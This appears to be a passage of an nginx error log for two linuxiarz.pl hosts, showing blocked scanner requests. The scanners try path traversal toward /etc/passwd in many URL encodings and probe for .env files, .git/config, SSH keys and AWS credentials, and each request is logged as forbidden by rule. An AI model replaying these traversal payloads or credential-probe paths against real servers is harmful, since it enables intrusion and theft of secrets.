HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:59:23 [error] 2791659#2791659: *2284067 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:59:24 [error] 2791659#2791659: *2284068 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:59:24 [error] 2791659#2791659: *2284069 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:59:24 [error] 2791659#2791659: *2284070 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:59:24 [error] 2791659#2791659: *2284071 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /static/..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:59:25 [error] 2791659#2791659: *2284072 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /static/..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:59:25 [error] 2791659#2791659: *2284073 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:59:25 [error] 2791659#2791659: *2284074 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:59:25 [error] 2791659#2791659: *2284075 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:59:26 [error] 2791659#2791659: *2284076 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:59:26 [error] 2791659#2791659: *2284077 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:59:26 [error] 2791659#2791659: *2284079 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:59:27 [error] 2791659#2791659: *2284080 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:59:27 [error] 2791659#2791659: *2284081 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:59:27 [error] 2791659#2791659: *2284082 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 01:59:28 [error] 2791659#2791659: *2284084 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 02:05:19 [error] 2791659#2791659: *2284367 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.config/sftp.json HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/25 02:05:30 [error] 2791659#2791659: *2284371 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.vscode/sftp.json HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/27 03:10:13 [error] 9363#9363: *36422 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.7, server: 0.0.0.0:443 +2025/09/27 17:39:24 [error] 9363#9363: *93635 access forbidden by rule, client: 23.180.120.244, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/27 17:39:24 [error] 9363#9363: *93641 access forbidden by rule, client: 23.180.120.244, server: nginx.linuxiarz.pl, request: "GET /.env.save HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/27 17:39:25 [error] 9363#9363: *93648 access forbidden by rule, client: 23.180.120.244, server: nginx.linuxiarz.pl, request: "GET /.env.prod HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/27 17:39:25 [error] 9363#9363: *93657 access forbidden by rule, client: 23.180.120.244, server: nginx.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/27 17:39:25 [error] 9363#9363: *93672 access forbidden by rule, client: 23.180.120.244, server: nginx.linuxiarz.pl, request: "GET /dev/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/27 17:39:25 [error] 9363#9363: *93686 access forbidden by rule, client: 23.180.120.244, server: nginx.linuxiarz.pl, request: "GET /application/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/27 17:39:27 [error] 9362#9362: *93743 access forbidden by rule, client: 23.180.120.244, server: nginx.linuxiarz.pl, request: "GET /backend/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/27 17:39:27 [error] 9363#9363: *93753 access forbidden by rule, client: 23.180.120.244, server: nginx.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/27 17:39:27 [error] 9363#9363: *93762 access forbidden by rule, client: 23.180.120.244, server: nginx.linuxiarz.pl, request: "GET /admin/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/29 05:32:43 [error] 9363#9363: *249688 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.config.php.swp HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/29 05:32:43 [error] 9363#9363: *249690 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/29 05:32:45 [error] 9363#9363: *249695 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/29 05:32:46 [error] 9363#9363: *249700 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.c9/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/29 05:32:49 [error] 9363#9363: *249711 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.mc HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/29 08:31:50 [error] 9363#9363: *261828 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.komodotools/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/29 09:38:13 [error] 9363#9363: *265507 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.fontconfig/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/29 09:38:14 [error] 9363#9363: *265512 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.idea/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/29 09:38:16 [error] 9363#9363: *265518 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.user.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/29 09:38:16 [error] 9363#9363: *265519 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/29 09:38:20 [error] 9363#9363: *265527 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.mc/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/29 09:38:28 [error] 9363#9363: *265568 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.komodotools/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/29 09:38:30 [error] 9363#9363: *265596 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.htpasswd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/29 09:38:36 [error] 9363#9363: *265616 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.listing HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/29 09:38:44 [error] 9363#9363: *265646 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.settings HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/29 09:38:56 [error] 9363#9363: *265678 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.python-eggs HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/29 09:38:56 [error] 9363#9363: *265679 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.ssh HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/29 09:38:57 [error] 9363#9363: *265683 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.svn HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/29 09:39:00 [error] 9363#9363: *265695 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.zip HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/29 09:39:05 [error] 9363#9363: *265706 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.cache HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/29 09:39:06 [error] 9363#9363: *265709 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.bash_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/29 09:39:14 [error] 9363#9363: *265741 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.inst/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/29 09:39:14 [error] 9363#9363: *265742 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.c9/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/29 09:39:16 [error] 9363#9363: *265752 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/29 09:39:22 [error] 9363#9363: *265763 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.cache/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/29 09:39:22 [error] 9363#9363: *265764 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.wp-config.php.swp HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/29 09:39:28 [error] 9363#9363: *265783 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.idea HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/29 09:39:38 [error] 9363#9363: *265810 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.codekit-cache HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/29 09:39:40 [error] 9363#9363: *265822 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/29 09:39:41 [error] 9363#9363: *265827 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.mc HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/29 09:39:43 [error] 9363#9363: *265841 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.grunt/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/29 09:39:48 [error] 9363#9363: *265859 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.hg HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/29 09:39:52 [error] 9363#9363: *265876 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/29 09:39:53 [error] 9363#9363: *265878 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.config.php.swp HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/29 09:40:16 [error] 9363#9363: *265976 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.svn/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/29 09:40:18 [error] 9363#9363: *265981 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.komodotools HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/29 09:40:21 [error] 9363#9363: *265993 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.pass HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/29 22:34:18 [error] 9363#9363: *311961 access forbidden by rule, client: 34.44.118.232, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/30 17:29:05 [error] 9363#9363: *397827 access forbidden by rule, client: 35.189.189.181, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/30 22:34:16 [error] 9363#9363: *418135 access forbidden by rule, client: 34.32.153.2, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:39:10 [error] 9363#9363: *545119 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:39:42 [error] 9363#9363: *545154 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /portal/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:39:52 [error] 9363#9363: *545165 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /env/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:40:11 [error] 9363#9363: *545194 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:40:18 [error] 9363#9363: *545203 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /app/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:40:19 [error] 9363#9363: *545204 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /dev/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:40:19 [error] 9363#9363: *545204 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /new/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:40:19 [error] 9363#9363: *545205 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /new/.env.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:40:19 [error] 9363#9363: *545205 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /new/.env.production HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:40:19 [error] 9363#9363: *545206 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /new/.env.staging HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:40:20 [error] 9363#9363: *545208 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /awstats/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:40:20 [error] 9363#9363: *545208 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /conf/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:40:20 [error] 9363#9363: *545208 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /cron/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:40:20 [error] 9363#9363: *545208 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /www/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:40:20 [error] 9363#9363: *545208 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /docker/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:40:20 [error] 9363#9363: *545211 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /docker/app/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:40:27 [error] 9363#9363: *545220 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /.vscode/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:40:27 [error] 9363#9363: *545220 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /js/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:40:28 [error] 9363#9363: *545224 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /laravel/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:40:42 [error] 9363#9363: *545231 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /laravel/core/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:40:47 [error] 9363#9363: *545250 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /laravel/core/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:40:47 [error] 9363#9363: *545250 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /mail/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:40:47 [error] 9363#9363: *545250 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /mailer/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:40:47 [error] 9363#9363: *545250 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /nginx/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:40:47 [error] 9363#9363: *545250 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /public/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:40:48 [error] 9363#9363: *545250 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /site/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:40:57 [error] 9363#9363: *545259 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /xampp/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:40:57 [error] 9363#9363: *545259 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /main/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:40:57 [error] 9363#9363: *545259 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /node_modules/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:40:57 [error] 9363#9363: *545259 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /kyc/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:40:57 [error] 9363#9363: *545259 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /admin/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:40:57 [error] 9363#9363: *545259 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /prod/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:40:57 [error] 9363#9363: *545259 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /.env.bak HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:40:58 [error] 9363#9363: *545259 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /website/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:40:58 [error] 9363#9363: *545259 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /development/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:41:04 [error] 9363#9363: *545259 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /backend/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:41:04 [error] 9363#9363: *545259 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /api/shared/config/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:41:05 [error] 9363#9363: *545259 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /api/shared/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:41:05 [error] 9363#9363: *545266 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /node/.env_example HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:41:05 [error] 9363#9363: *545266 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /.env.production.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:41:05 [error] 9363#9363: *545266 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /.env.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:41:05 [error] 9363#9363: *545266 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:41:05 [error] 9363#9363: *545266 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /.env.stage HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:41:06 [error] 9363#9363: *545266 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /.env.old HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:41:06 [error] 9363#9363: *545266 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /.env_sample HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:41:06 [error] 9363#9363: *545266 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /.env.prod HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:41:06 [error] 9363#9363: *545266 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /crm/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:41:06 [error] 9363#9363: *545266 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /local/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:41:06 [error] 9363#9363: *545266 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /core/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:41:06 [error] 9363#9363: *545266 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /apps/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:41:07 [error] 9363#9363: *545266 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /application/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:41:07 [error] 9363#9363: *545266 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /web/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:41:11 [error] 9363#9363: *545266 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /.aws/credentials HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:41:18 [error] 9363#9363: *545283 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /.circleci/configs/development.yml HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:41:20 [error] 9363#9363: *545283 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /.AWS_/credentials HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:41:21 [error] 9363#9363: *545283 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /.travis.yml HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/02 07:41:21 [error] 9363#9363: *545283 access forbidden by rule, client: 45.148.10.243, server: nginx.linuxiarz.pl, request: "GET /.aws/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/03 00:23:52 [error] 9363#9363: *603315 access forbidden by rule, client: 18.206.243.172, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/03 21:31:26 [error] 9362#9362: *688885 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.7, server: 0.0.0.0:443 +2025/10/07 19:10:14 [error] 1439588#1439588: *45499 access forbidden by rule, client: 35.203.167.177, server: kodi.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/10/08 19:38:05 [error] 1439588#1439588: *170018 access forbidden by rule, client: 35.185.106.123, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/10 20:36:53 [error] 1439587#1439587: *457056 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.7, server: 0.0.0.0:443 +2025/10/12 17:46:21 [error] 1439588#1439588: *684428 access forbidden by rule, client: 213.209.157.93, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/13 20:17:01 [error] 1439588#1439588: *774978 access forbidden by rule, client: 185.177.72.23, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/13 20:17:02 [error] 1439588#1439588: *774979 access forbidden by rule, client: 185.177.72.23, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/13 20:17:02 [error] 1439588#1439588: *774979 access forbidden by rule, client: 185.177.72.23, server: nginx.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/13 20:17:02 [error] 1439588#1439588: *774979 access forbidden by rule, client: 185.177.72.23, server: nginx.linuxiarz.pl, request: "GET /config/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/13 20:17:02 [error] 1439588#1439588: *774979 access forbidden by rule, client: 185.177.72.23, server: nginx.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/13 20:17:02 [error] 1439588#1439588: *774979 access forbidden by rule, client: 185.177.72.23, server: nginx.linuxiarz.pl, request: "GET /.env.production HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/13 20:17:02 [error] 1439588#1439588: *774979 access forbidden by rule, client: 185.177.72.23, server: nginx.linuxiarz.pl, request: "GET /.env.dev HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/13 20:17:02 [error] 1439588#1439588: *774979 access forbidden by rule, client: 185.177.72.23, server: nginx.linuxiarz.pl, request: "GET /backend/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/13 20:17:02 [error] 1439588#1439588: *774979 access forbidden by rule, client: 185.177.72.23, server: nginx.linuxiarz.pl, request: "GET /.env.backup HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/15 11:37:05 [error] 1439588#1439588: *985874 access forbidden by rule, client: 185.177.72.8, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/10/17 19:22:22 [error] 1439588#1439588: *1263579 access forbidden by rule, client: 45.148.10.238, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/2.0", host: "nginx.linuxiarz.pl" +2025/10/17 23:47:27 [error] 1439587#1439587: *1285237 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 